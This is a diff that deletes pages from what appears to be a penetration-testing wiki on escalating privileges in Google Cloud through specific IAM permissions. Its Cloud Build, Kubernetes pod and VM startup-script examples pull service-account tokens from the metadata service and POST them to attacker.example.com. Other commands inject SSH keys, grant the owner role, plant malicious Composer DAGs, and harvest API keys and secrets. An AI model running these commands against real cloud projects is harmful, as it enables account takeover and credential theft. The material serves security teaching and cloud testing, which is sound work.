-This means that as part of creating certain resources, you must "actAs" the Service Account for the call to complete successfully. For example, when starting a new Compute Engine instance with an attached Service Account, you need _iam.serviceAccounts.actAs_ on that Service Account. This is because, without that requirement, users starting with fewer permissions could escalate through such resources.
-
-**There are multiple individual methods that use _iam.serviceAccounts.actAs_, so depending on your own permissions, you may only be able to exploit one (or more) of the methods below**. These methods are slightly different in that they **require multiple permissions to exploit, rather than a single permission** like all of the previous methods.
-
-## iam.serviceAccounts.getOpenIdToken
-
-This permission can be used to generate an OpenID JWT. These are used to assert identity and do not necessarily carry any implicit authorization against a resource.
-
-According to this [**interesting post**](https://medium.com/google-cloud/authenticating-using-google-openid-connect-tokens-e7675051213b), it's necessary to indicate the audience (the service where you want to use the token to authenticate) and you will receive a JWT signed by Google indicating the service account and the audience of the JWT.
-
-You can generate an OpenIDToken (if you have the access) with:
-
-```bash
-# First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA
-gcloud auth activate-service-account --key-file=/path/to/svc_account.json
-# Then, generate token
-gcloud auth print-identity-token "${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com" --audiences=https://example.com
-```
-
-Then you can just use it to access the service with:
-
-```bash
-curl -v -H "Authorization: Bearer $ID_TOKEN" https://some-cloud-run-uc.a.run.app
-```
-
-Some services that support authentication via this kind of tokens are:
-
-* [Google Cloud Run](https://cloud.google.com/run/)
-* [Google Cloud Functions](https://cloud.google.com/functions/docs/)
-* [Google Identity Aware Proxy](https://cloud.google.com/iap/docs/authentication-howto)
-* [Google Cloud Endpoints](https://cloud.google.com/endpoints/docs/openapi/authenticating-users-google-id) (if using Google OIDC)
-
-You can find an example of how to create an OpenID token on behalf of a service account [**here**](https://github.com/carlospolop-forks/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getOpenIdToken.py).
-
-# resourcemanager
-
-## resourcemanager.organizations.setIamPolicy
-
-Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **organization** level. So, you can follow the same exploitation example.
-
-## resourcemanager.folders.setIamPolicy
-
-Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **folder** level. So, you can follow the same exploitation example.
-
-## resourcemanager.projects.setIamPolicy
-
-Like in the exploitation of [**iam.serviceAccounts.setIamPolicy**](gcp-privesc-to-other-principals.md#iam.serviceaccounts.setiampolicy), this permission allows you to **modify** your **permissions** against **any resource** at **project** level. So, you can follow the same exploitation example.
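-
-For example, at project level the binding can be added with (member and role are placeholders for whatever you want to grant yourself):
-
-```bash
-# Grant yourself a powerful role over the whole project
-gcloud projects add-iam-policy-binding [PROJECT_ID] \
-    --member="user:attacker@example.com" \
-    --role="roles/owner"
-```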
-
-# deploymentmanager
-
-## deploymentmanager.deployments.create
-
-This single permission lets you **launch new deployments** of resources into GCP with arbitrary service accounts. You could for example launch a compute instance with a SA to escalate to it.
-
-You could actually **launch any resource** listed in `gcloud deployment-manager types list`
-
-In the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/) the following [**script**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/deploymentmanager.deployments.create.py) is used to deploy a compute instance; however, that script won't work. Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/1-deploymentmanager.deployments.create.sh)**.**
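-
-A minimal sketch of the technique (all names and values are placeholders; this is not the referenced script):
-
-```bash
-# Deployment config that launches a VM with the target SA attached
-cat > privesc-config.yaml <<EOF
-resources:
-- name: privesc-vm
-  type: compute.v1.instance
-  properties:
-    zone: us-central1-a
-    machineType: zones/us-central1-a/machineTypes/f1-micro
-    disks:
-    - deviceName: boot
-      boot: true
-      autoDelete: true
-      initializeParams:
-        sourceImage: projects/debian-cloud/global/images/family/debian-11
-    networkInterfaces:
-    - network: global/networks/default
-      accessConfigs:
-      - type: ONE_TO_ONE_NAT
-    serviceAccounts:
-    - email: [TARGET_SA_EMAIL]
-      scopes:
-      - https://www.googleapis.com/auth/cloud-platform
-EOF
-gcloud deployment-manager deployments create privesc-dep --config privesc-config.yaml
-# Then get into the VM (SSH or a startup-script) and steal the SA token from the metadata service
-```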
-
-## deploymentmanager.deployments.**update**
-
-This is like the previous abuse, but instead of creating a new deployment, you modify one that already exists (so be careful).
-
-Check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/e-deploymentmanager.deployments.update.sh)**.**
-
-## deploymentmanager.deployments.**setIamPolicy**
-
-This is like the previous abuse, but instead of directly creating a new deployment, you first grant yourself that access and then abuse the permission as explained in the previous _deploymentmanager.deployments.create_ section.
-
-# cloudbuild
-
-## cloudbuild.builds.create
-
-With this permission you can **submit a cloud build**. The cloudbuild machine will have in its filesystem by **default a token of the powerful cloudbuild Service Account**: `[PROJECT_NUMBER]@cloudbuild.gserviceaccount.com`. However, you can **indicate any service account inside the project** in the cloudbuild configuration.\
-Therefore, you can just make the machine exfiltrate the token to your server or **get a reverse shell inside of it and get the token yourself** (the file containing the token might change).
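-
-A minimal sketch of the idea (the attacker URL is a placeholder; the referenced scripts below are more complete):
-
-```bash
-# Build step that reads the build SA token from the metadata service and exfiltrates it
-cat > cloudbuild.yaml <<EOF
-steps:
-- name: 'gcr.io/cloud-builders/gcloud'
-  entrypoint: 'bash'
-  args:
-  - '-c'
-  - 'curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" | curl -s -X POST -d @- https://attacker.example.com/'
-EOF
-gcloud builds submit --no-source --config cloudbuild.yaml
-```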
-
-You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside of the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.**
-
-For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/)
-
-## cloudbuild.builds.update
-
-**Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API).
-
-# compute
-
-## compute.projects.setCommonInstanceMetadata
-
-With that permission you can **modify** the **metadata** information of an **instance** and change the **authorized keys of a user**, or **create** a **new user with sudo** permissions. Therefore, you will be able to SSH into any VM instance and steal the GCP Service Account the instance is running with (see the sketch below).\
-Limitations:
-
-* Note that GCP Service Accounts running in VM instances by default have a **very limited scope**
-* You will need to be **able to contact the SSH** server to login
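-
-A sketch of the SSH-key injection (the username is a placeholder; the key pair is yours):
-
-```bash
-# Add your public key to the project-wide metadata; the guest agent will create the user
-gcloud compute project-info add-metadata \
-    --metadata ssh-keys="attacker:$(cat ~/.ssh/id_rsa.pub)"
-# Then: ssh attacker@[INSTANCE_EXTERNAL_IP] and query the metadata endpoint for the SA token
-```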
-
-For more information about how to exploit this permission check:
-
-{% content-ref url="../gcp-local-privilege-escalation-ssh-pivoting.md" %}
-[gcp-local-privilege-escalation-ssh-pivoting.md](../gcp-local-privilege-escalation-ssh-pivoting.md)
-{% endcontent-ref %}
-
-## compute.instances.setMetadata
-
-This permission gives the **same privileges as the previous permission**, but over specific instances instead of the whole project. The **same exploits and limitations apply**.
-
-## compute.instances.setIamPolicy
-
-This kind of permission will allow you to **grant yourself a role with the previous permissions** and escalate privileges abusing them.
-
-## **compute.instances.osLogin**
-
-If OSLogin is enabled on the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to it. You won't have root privileges inside the instance.
-
-## **compute.instances.osAdminLogin**
-
-If OSLogin is enabled on the instance, with this permission you can just run **`gcloud compute ssh [INSTANCE]`** and connect to it. You will have root privileges inside the instance.
-
-# container
-
-## container.clusters.get
-
-This permission allows you to **gather credentials for the Kubernetes cluster** using something like:
-
-```bash
-gcloud container clusters get-credentials [CLUSTER_NAME] --zone [ZONE]
-```
-
-Without extra permissions, the credentials are pretty basic as you can **just list some resources**, but they are useful to find misconfigurations in the environment.
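-
-Once the kubeconfig is populated you can enumerate with standard `kubectl`, e.g.:
-
-```bash
-# Check what the obtained credentials can do and start enumerating
-kubectl auth can-i --list
-kubectl get namespaces
-kubectl get pods --all-namespaces
-kubectl get secrets --all-namespaces # Usually forbidden, but worth trying
-```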
-
-{% hint style="info" %}
-Note that **Kubernetes clusters might be configured to be private**, which will disallow access to the Kube-API server from the Internet.
-{% endhint %}
-
-## container.clusters.getCredentials
-
-Apparently this permission might be useful to gather auth credentials (the basic auth method isn't supported anymore by GKE in the latest versions).
-
-## container.roles.escalate/container.clusterRoles.escalate
-
-**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions than the ones the principal has**. However, a **GCP** principal with those permissions will be **able to create/update Roles/ClusterRoles with more permissions** than the ones it holds, effectively bypassing the Kubernetes protection against this behaviour.
-
-**container.roles.create** and/or **container.roles.update** OR **container.clusterRoles.create** and/or **container.clusterRoles.update** respectively are also **necessary** to perform those privilege escalation actions.
-
-## container.roles.bind/container.clusterRoles.bind
-
-**Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions than the ones the principal has**. However, a **GCP** principal with those permissions will be **able to create/update RoleBindings/ClusterRoleBindings with more permissions** than the ones it has, effectively bypassing the Kubernetes protection against this behaviour.
-
-**container.roleBindings.create** and/or **container.roleBindings.update** OR **container.clusterRoleBindings.create** and/or **container.clusterRoleBindings.update** respectively are also **necessary** to perform those privilege escalation actions.
-
-## container.cronJobs.create, container.cronJobs.update container.daemonSets.create, container.daemonSets.update container.deployments.create, container.deployments.update container.jobs.create, container.jobs.update container.pods.create, container.pods.update container.replicaSets.create, container.replicaSets.update container.replicationControllers.create, container.replicationControllers.update container.scheduledJobs.create, container.scheduledJobs.update container.statefulSets.create, container.statefulSets.update
-
-All these permissions are going to allow you to **create or update a resource** where you can **define** a **pod**. When defining a pod you can **specify the SA** that is going to be **attached** and the **image** that is going to be **run**; therefore, you can run an image that will **exfiltrate the token of the SA to your server**, allowing you to escalate to any service account (see the sketch below).\
-For more information check:
-
-{% content-ref url="../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/" %}
-[abusing-roles-clusterroles-in-kubernetes](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/)
-{% endcontent-ref %}
-
-As we are in a GCP environment, you will also be able to **get the nodepool GCP SA** from the **metadata** service and **escalate privileges in GCP** (by default the compute SA is used).
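-
-As a sketch, a pod that exfiltrates both the mounted K8s SA token and the nodepool GCP SA token (the SA name and attacker URL are placeholders):
-
-```bash
-kubectl apply -f - <<EOF
-apiVersion: v1
-kind: Pod
-metadata:
-  name: token-stealer
-spec:
-  serviceAccountName: [TARGET_K8S_SA]
-  containers:
-  - name: stealer
-    image: curlimages/curl
-    command: ["sh", "-c"]
-    args:
-    - |
-      # K8s SA token mounted inside the pod
-      curl -s -X POST --data-binary @/var/run/secrets/kubernetes.io/serviceaccount/token https://attacker.example.com/k8s;
-      # Nodepool GCP SA token from the metadata service
-      curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" | curl -s -X POST -d @- https://attacker.example.com/gcp
-EOF
-```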
-
-## container.secrets.get, container.secrets.list
-
-As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#listing-secrets), with these permissions you can **read** the **tokens** of all the **SAs of kubernetes**, so you can escalate to them.
-
-## container.pods.exec
-
-With this permission you will be able to **exec into pods**, which gives you **access** to all the **Kubernetes SAs running in pods** to escalate privileges within K8s; but you will also be able to **steal** the **GCP Service Account** of the **NodePool**, **escalating privileges in GCP**.
-
-## container.pods.portForward
-
-As [**explained in this page**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#port-forward), with these permissions you can **access local services** running in **pods** that might allow you to **escalate privileges in Kubernetes** (and in **GCP** if somehow you manage to talk to the metadata service)**.**
-
-## container.serviceAccounts.createToken
-
-Because of the **name** of the **permission**, it **looks like it will allow you to generate tokens of the K8s Service Accounts**, so you would be able to **privesc to any SA** inside Kubernetes. However, I couldn't find any API endpoint to use it, so let me know if you find one.
-
-## container.mutatingWebhookConfigurations.create, container.mutatingWebhookConfigurations.update
-
-These permissions might allow you to escalate privileges in Kubernetes, but more probably, you could abuse them to **persist in the cluster**.\
-For more information [**follow this link**](../../pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/#malicious-admission-controller).
-
-# storage
-
-## storage.hmacKeys.create
-
-There is a feature of Cloud Storage, "interoperability", that provides a way for Cloud Storage to interact with storage offerings from other cloud providers, like AWS S3. As part of that, there are HMAC keys that can be created for both Service Accounts and regular users. We can **escalate Cloud Storage permissions by creating an HMAC key for a higher-privileged Service Account**.
-
-HMAC keys belonging to your user cannot be accessed through the API and must be accessed through the web console, but what's nice is that both the access key and secret key are available at any point. This means we could take an existing pair and store them for backup access to the account. HMAC keys belonging to Service Accounts **can** be accessed through the API, but after creation, you are not able to see the access key and secret again.
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-1.png)
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/storage.hmacKeys.create.py).
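-
-With `gsutil` the key creation is a one-liner (the SA email is a placeholder):
-
-```bash
-# Create an HMAC key for the target SA; the access key and secret are printed only once
-gsutil hmac create [TARGET_SA_EMAIL]
-# The returned pair can then be used with any S3-compatible client against Cloud Storage
-```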
-
-## storage.objects.get
-
-This permission allows you to **download files stored inside GCP Storage**. This will potentially allow you to escalate privileges because on some occasions **sensitive information is saved there**. Moreover, some GCP services store their information in buckets (see the sketch after this list):
-
-* **GCP Composer**: When you create a Composer environment the **code of all the DAGs** will be saved inside a **bucket**. These tasks might contain interesting information inside their code.
-* **GCR (Container Registry)**: The **images** of the containers are stored inside **buckets**, which means that if you can read the buckets you will be able to download the images and **search for leaks and/or source code**.
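-
-Typical enumeration and download, sketched with placeholder names:
-
-```bash
-# List and download interesting objects
-gsutil ls gs://[BUCKET_NAME]/
-gsutil cp -r gs://[BUCKET_NAME]/ ./loot/
-# e.g. pull image layers from the GCR registry bucket
-gsutil ls "gs://artifacts.[PROJECT_ID].appspot.com/"
-```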
-
-## storage.objects.create, storage.objects.delete
-
-In order to **create a new object** inside a bucket you need `storage.objects.create` and, according to [the docs](https://cloud.google.com/storage/docs/access-control/iam-permissions#object\_permissions), you also need `storage.objects.delete` to **modify** an existing object.
-
-A very **common exploitation** of writable buckets in the cloud is when the **bucket is saving web server files**: you might be able to **store new code** that will be used by the web application.
-
-Moreover, several GCP services also **store code inside buckets** that is later **executed**:
-
-* **GCP Composer**: The **DAG code** is **stored in GCP Storage**. This **code** is later **executed** inside the **K8s environment** used by composer, which also has **access to a GCP SA**. Therefore, by modifying this code you might be able to get inside the composer K8s env and steal the token of the GCP SA used.
-* **GCR (Container Registry)**: The **container images are stored inside buckets**. So if you have write access over them, you could **modify the images** and execute your own code whenever that container is used.
-  * The bucket used by GCR will have a URL similar to `gs://[eu/us/asia/nothing].artifacts.[PROJECT_ID].appspot.com` (the top-level subdomains are specified [here](https://cloud.google.com/container-registry/docs/pushing-and-pulling)).
-
-## storage.objects.setIamPolicy
-
-You can grant yourself the permissions needed to **abuse any of the previous scenarios of this section**.
-
-# storage.objects Write permission
-
-If you can modify or add objects in buckets, you might be able to escalate your privileges to other resources that use the bucket to store code they execute.
-
-## Composer
-
-**Composer** is **Apache Airflow** managed inside GCP. It has several interesting features:
-
-* It runs inside a **GKE cluster**, so the **SA the cluster uses is accessible** by the code running inside Composer
-* It stores the **code in a bucket**; therefore, **anyone with write access over that bucket** will be able to change/add DAG code (the code Apache Airflow will execute)
-
-Then, if you have **write access over the bucket Composer uses** to store the code, you can **privesc to the SA running in the GKE cluster**.
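-
-A sketch of the abuse (the bucket name and DAG file are placeholders):
-
-```bash
-# Locate the Composer bucket and drop a malicious DAG into its dags/ folder
-gsutil ls # Look for a bucket with a name like gs://[REGION]-[ENV_NAME]-[RANDOM]-bucket
-gsutil cp evil_dag.py gs://[COMPOSER_BUCKET]/dags/
-# The scheduler will pick the DAG up and execute it with the cluster's SA
-```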
-
-# References
-
-* [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)
-* [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/#gcp-privesc-scanner)
-
diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md
deleted file mode 100644
index 331a448f0..000000000
--- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-resources.md
+++ /dev/null
@@ -1,269 +0,0 @@
-
-# cloudfunctions
-
-## cloudfunctions.functions.create,iam.serviceAccounts.actAs
-
-For this method, we will be **creating a new Cloud Function with an associated Service Account** that we want to gain access to. Because Cloud Function invocations have **access to the metadata** API, we can request a token directly from it, just like on a Compute Engine instance.
-
-The **required permissions** for this method are as follows:
-
-* _cloudfunctions.functions.call_ **OR** _cloudfunctions.functions.setIamPolicy_
-* _cloudfunctions.functions.create_
-* _cloudfunctions.functions.sourceCodeSet_
-* _iam.serviceAccounts.actAs_
-
-The script for this method uses a premade Cloud Function that is included on GitHub, meaning you will need to upload the associated .zip file and make it public on Cloud Storage (see the exploit script for more information). Once the function is created and uploaded, you can either invoke the function directly or modify the IAM policy to allow you to invoke the function. The response will include the access token belonging to the Service Account assigned to that Cloud Function.
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image12-750x618.png)
-
-The script creates the function and waits for it to deploy, then runs it and receives the access token in the response.
-
-The exploit scripts for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-call.py) and [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.create-setIamPolicy.py) and the prebuilt .zip file can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudFunctions).
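-
-A gcloud sketch of the same flow (names and paths are placeholders; the source dir would contain code that dumps the metadata token):
-
-```bash
-# Deploy a function running as the target SA, then invoke it
-gcloud functions deploy privesc-func --runtime python39 --trigger-http \
-    --source /path/to/malicious/source --entry-point main \
-    --service-account "[TARGET_SA_EMAIL]"
-gcloud functions call privesc-func
-```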
-
-## cloudfunctions.functions.update,iam.serviceAccounts.actAs
-
-Similar to _cloudfunctions.functions.create_, this method **updates (overwrites) an existing function instead of creating a new one**. The API used to update the function also allows you to **swap the Service Account if there is another one you want to get the token for**. The script will update the target function with the malicious code, wait for it to deploy, then finally invoke it to get the Service Account access token returned.
-
-The following **permissions are required** for this method:
-
-* _cloudfunctions.functions.sourceCodeSet_
-* _cloudfunctions.functions.update_
-* _iam.serviceAccounts.actAs_
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudfunctions.functions.update.py).
-
-# compute
-
-## compute.instances.create,iam.serviceAccounts.actAs
-
-This method **creates a new Compute Engine instance with a specified Service Account**, then **sends the token** belonging to that Service Account to an **external server.**
-
-The following **permissions are required** for this method:
-
-* _compute.disks.create_
-* _compute.instances.create_
-* _compute.instances.setMetadata_
-* _compute.instances.setServiceAccount_
-* _compute.subnetworks.use_
-* _compute.subnetworks.useExternalIp_
-* _iam.serviceAccounts.actAs_
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image9-750x594.png)
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/compute.instances.create.py).
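-
-A gcloud sketch of the same idea (the SA email and attacker URL are placeholders):
-
-```bash
-# Boot a VM as the target SA and exfiltrate its token from the startup script
-gcloud compute instances create privesc-vm --zone us-central1-a \
-    --service-account "[TARGET_SA_EMAIL]" --scopes cloud-platform \
-    --metadata startup-script='curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" | curl -s -X POST -d @- https://attacker.example.com/'
-```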
-
-# run
-
-## run.services.create,iam.serviceAccounts.actAs
-
-Similar to the _cloudfunctions.functions.create_ method, this method creates a **new Cloud Run Service** that, when invoked, **returns the Service Account's** access token by accessing the metadata API of the server it is running on. A Cloud Run service will be deployed and a request can be made to it to get the token.
-
-The following **permissions are required** for this method:
-
-* _run.services.create_
-* _iam.serviceAccounts.actAs_
-* _run.services.setIamPolicy_ **OR** _run.routes.invoke_
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image8-1000x503.png)
-
-This method uses an included Docker image that must be built and hosted to exploit correctly. The image is designed to tell Cloud Run to respond with the Service Account's access token when an HTTP request is made.
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/run.services.create.py) and the Docker image can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/tree/master/ExploitScripts/CloudRunDockerImage).
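-
-The deployment step, sketched with placeholders:
-
-```bash
-# Deploy the token-returning image as the target SA and call it
-gcloud run deploy privesc-run --image [MALICIOUS_IMAGE_URL] \
-    --service-account "[TARGET_SA_EMAIL]" --region us-central1 --allow-unauthenticated
-curl "$(gcloud run services describe privesc-run --region us-central1 --format 'value(status.url)')"
-```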
-
-# Cloudscheduler
-
-## cloudscheduler.jobs.create,iam.serviceAccounts.actAs
-
-Cloud Scheduler allows you to set up cron jobs targeting arbitrary HTTP endpoints. **If that endpoint is a \*.googleapis.com endpoint**, then you can also tell Scheduler that you want it to authenticate the request **as a specific Service Account**, which is exactly what we want.
-
-Because we control all aspects of the HTTP request being made from Cloud Scheduler, we can set it up to hit another Google API endpoint. For example, if we wanted to create a new job that will use a specific Service Account to create a new Storage bucket on our behalf, we could run the following command:
-
-```bash
-gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://storage.googleapis.com/storage/v1/b?project=[PROJECT_ID]' --message-body '{"name":"new-bucket-name"}' --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers Content-Type=application/json
-```
-
-This command would schedule an HTTP POST request every minute that authenticates as _111111111111-compute@developer.gserviceaccount.com_. The request will hit the Cloud Storage API endpoint and will create a new bucket with the name "new-bucket-name".
-
-The following permissions are required for this method:
-
-* _cloudscheduler.jobs.create_
-* _cloudscheduler.locations.list_
-* _iam.serviceAccounts.actAs_
-
-To escalate our privileges with this method, we just need to **craft the HTTP request of the API we want to hit as the Service Account we pass in**. Instead of a script, you can just use the gcloud command above.
-
-A similar method may be possible with Cloud Tasks, but we were not able to do it in our testing.
-
-# orgpolicy
-
-## orgpolicy.policy.set
-
-This method does **not necessarily grant you more IAM permissions**, but it may **disable some barriers** that are preventing certain actions. For example, there is an Organization Policy constraint named _appengine.disableCodeDownload_ that prevents App Engine source code from being downloaded by users of the project. If this was enabled, you would not be able to download that source code, but you could use _orgpolicy.policy.set_ to disable the constraint and then continue with the source code download.
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image5-1.png)
-
-The screenshot above shows that the _appengine.disableCodeDownload_ constraint is enforced, which means it is preventing us from downloading the source code. Using _orgpolicy.policy.set_, we can disable that enforcement and then continue on to download the source code.
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).
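-
-As a sketch, the same can be done from gcloud (the project is a placeholder):
-
-```bash
-# Disable enforcement of the constraint that blocks source downloads
-gcloud resource-manager org-policies disable-enforce \
-    appengine.disableCodeDownload --project [PROJECT_ID]
-# Then continue with the App Engine source code download
-```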
-
-# serviceusage
-
-The following permissions are useful to create and steal API keys; note this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._
-
-Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
-
-## serviceusage.apiKeys.create
-
-There is another method of authenticating with GCP APIs known as API keys. By default, they are created with no restrictions, which means they have access to the entire GCP project they were created in. We can capitalize on that fact by creating a new API key that may have more privileges than our own user. There is no official API for this, so a custom HTTP request needs to be sent to _https://apikeys.clients6.google.com/_ (or _https://apikeys.googleapis.com/_). This was discovered by monitoring the HTTP requests and responses while browsing the GCP web console. For documentation on the restrictions associated with API keys, visit [this link](https://cloud.google.com/docs/authentication/api-keys).
-
-The following screenshot shows how you would create an API key in the web console.
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image6-1.png)
-
-With the undocumented API that was discovered, we can also create API keys through the API itself, by sending a POST request to retrieve a new API key for the project.
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.create.py).
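-
-A sketch of the raw request (the v2 endpoint is nowadays documented; the project number is a placeholder):
-
-```bash
-# Create an unrestricted API key in the project
-curl -s -X POST \
-    -H "Authorization: Bearer $(gcloud auth print-access-token)" \
-    -H "Content-Type: application/json" -d '{}' \
-    "https://apikeys.googleapis.com/v2/projects/[PROJECT_NUMBER]/locations/global/keys"
-```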
-
-## serviceusage.apiKeys.list
-
-Another undocumented API was found for listing API keys that have already been created (this can also be done in the web console). Because you can still see the API key's value after its creation, we can pull all the API keys in the project.
-
-![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image4-1.png)
-
-The screenshot above shows that the request is exactly the same as before, except that it is a GET request instead of a POST request. This only shows a single key, but if there were additional keys in the project, those would be listed too.
-
-The exploit script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/serviceusage.apiKeys.list.py).
-
-# apikeys
-
-The following permissions are useful to create and steal API keys; note this from the docs: _An API key is a simple encrypted string that **identifies an application without any principal**. They are useful for accessing **public data anonymously**, and are used to **associate** API requests with your project for quota and **billing**._
-
-Therefore, with an API key you can make that company pay for your use of the API, but you won't be able to escalate privileges.
-
-## apikeys.keys.create
-
-This permission allows you to **create an API key**:
-
-```bash
-gcloud alpha services api-keys create
-Operation [operations/akmf.p7-[...]9] complete. Result: {
- "@type":"type.googleapis.com/google.api.apikeys.v2.Key",
- "createTime":"2022-01-26T12:23:06.281029Z",
- "etag":"W/\"HOhA[...]==\"",
- "keyString":"AIzaSy[...]oU",
- "name":"projects/5[...]6/locations/global/keys/f707[...]e8",
- "uid":"f707[...]e8",
- "updateTime":"2022-01-26T12:23:06.378442Z"
-}
-```
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/b-apikeys.keys.create.sh).
-
-## apikeys.keys.getKeyString,apikeys.keys.list
-
-These permissions allow you to **list all the API keys and get their key strings**:
-
-```bash
-for key in $(gcloud --impersonate-service-account="${SERVICE_ACCOUNT_ID}@${PROJECT_ID}.iam.gserviceaccount.com" alpha services api-keys list --uri); do
- gcloud --impersonate-service-account="${SERVICE_ACCOUNT_ID}@${PROJECT_ID}.iam.gserviceaccount.com" alpha services api-keys get-key-string "$key"
-done
-```
-
-You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh).
-
-## apikeys.keys.regenerate,apikeys.keys.list
-
-These permissions will (potentially) allow you to **list and regenerate all the API keys, getting the new key**.\
-It's not possible to use this from `gcloud`, but you can probably use it via the API. Once it's supported, the exploitation will be similar to the previous one (I guess).
-
-## apikeys.keys.lookup
-
-This is extremely useful to check **which GCP project an API key you have found belongs to**:
-
-```bash
-gcloud alpha services api-keys lookup AIzaSyD[...]uE8Y
-name: projects/5[...]6/locations/global/keys/28d[...]e0e
-parent: projects/5[...]6/locations/global
-```
-
-In this scenario it could also be interesting to run the tool [https://github.com/ozguralp/gmapsapiscanner](https://github.com/ozguralp/gmapsapiscanner) and check what you can access with the API key.
-
-# secretmanager
-
-## secretmanager.secrets.get
-
-This gives you access to read the secrets from Secret Manager.
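-
-A sketch (note that reading a secret's payload also requires _secretmanager.versions.access_):
-
-```bash
-# List secrets and pull the latest version of one (placeholder name)
-gcloud secrets list
-gcloud secrets versions access latest --secret="[SECRET_NAME]"
-```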
-
-## secretmanager.secrets.setIamPolicy
-
-This allows you to grant yourself access to read the secrets from Secret Manager.
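-
-For example (the member is a placeholder):
-
-```bash
-# Grant yourself the accessor role over the secret, then read it
-gcloud secrets add-iam-policy-binding "[SECRET_NAME]" \
-    --member="user:attacker@example.com" \
-    --role="roles/secretmanager.secretAccessor"
-```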
-
-# \*.setIamPolicy
-
